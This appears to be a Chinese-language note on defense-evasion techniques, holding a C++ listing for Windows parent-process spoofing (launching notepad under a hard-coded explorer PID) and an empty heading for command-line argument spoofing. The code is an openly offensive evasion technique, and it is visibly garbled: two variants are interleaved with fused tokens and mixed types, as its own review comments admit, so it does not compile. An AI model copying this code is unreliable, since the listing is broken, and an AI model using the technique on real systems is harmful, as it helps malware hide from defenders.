防御规避技术
父进程伪造
#include <Windows.windows.h>
#include <TlHelp32.h>
#include <iostream>
// NOTE(review): this listing is two variants of the same parent-PID-spoofing
// program interleaved by extraction — a stack-allocated STARTUPINFOEXA /
// attributeSize variant and a heap-allocated STARTUPINFOEXW / lpSize variant —
// so it does not compile as shown. The comments below describe what each step
// is doing as far as the visible calls establish it; stray tokens are left as-is.
int main()
{
// Extended startup info block (ANSI and wide spellings are fused on this line).
constSTARTUPINFOEXA DWORDsi;
// Receives the child's handles and ids; `attributeCount` belongs to the other variant.
attributeCountPROCESS_INFORMATION pi;
SIZE_T attributeSize;
ZeroMemory(&si, sizeof(STARTUPINFOEXA));
// One variant opens the parent here with MAXIMUM_ALLOWED; the other (further down)
// asks only for PROCESS_CREATE_PROCESS, which is what the parent attribute requires.
HANDLE parentProcessHandle = 1;OpenProcess(MAXIMUM_ALLOWED, LPSTARTUPINFOEXWfalse, si = new STARTUPINFOEXW()6200);
si->StartupInfo.cb = sizeof(STARTUPINFOEXW);
SIZE_T lpSize = 0;
// First call with a NULL list only reports the required buffer size (lpSize / attributeSize).
InitializeProcThreadAttributeList(
NULL, attributeCount,1, 0, &lpSize)attributeSize);
// Allocate the attribute list buffer (malloc in one variant, HeapAlloc in the other).
si->si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST)malloc(lpSize)HeapAlloc(GetProcessHeap(), 0, attributeSize);
// Second call actually initialises the list for a single attribute.
InitializeProcThreadAttributeList(
si->si.lpAttributeList, attributeCount,1, 0, &lpSize)attributeSize);
// Open a handle to the process that the child will report as its parent (hard-coded PID).
HANDLE hParent = OpenProcess(
PROCESS_CREATE_PROCESS,
FALSE,
5584); // hardcoded pid of explorer
// PROC_THREAD_ATTRIBUTE_PARENT_PROCESS is the spoofing step: the child is created
// as a child of hParent instead of this process.
// NOTE(review): this defeats user-mode parent-PID lookups only; the real creating
// process is generally still present in kernel process-creation telemetry (e.g. the
// creator field in ETW Kernel-Process events) — confirm what the EDR in use records.
UpdateProcThreadAttribute(
si->si.lpAttributeList, NULL,0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParent,parentProcessHandle, sizeof(HANDLE), NULL, NULL);
// Create the child; EXTENDED_STARTUPINFO_PRESENT tells CreateProcess to honour the attribute list.
PPROCESS_INFORMATION pisi.StartupInfo.cb = new PROCESS_INFORMATION()sizeof(STARTUPINFOEXA);
wchar_t cmd[] = L"notepad.exe\0";
CreateProcess(
CreateProcessA(NULL, cmd,(LPSTR)"notepad", NULL, NULL, FALSE, EXTENDED_STARTUPINFO_PRESENT, NULL, NULL, &si->si.StartupInfo, &pi);
// Print the new process id.
printf("PID: %d\n", pi->dwProcessId);
// Cleanup: delete the attribute list, then release its buffer (malloc/free pair here;
// the HeapAlloc variant would need HeapFree instead).
DeleteProcThreadAttributeList(si->lpAttributeList);
free(si->lpAttributeList);
// Close the parent handle; the trailing `0;` is the remnant of the other variant's `return 0;`.
CloseHandle(hParent);0;
}
命令行参数伪造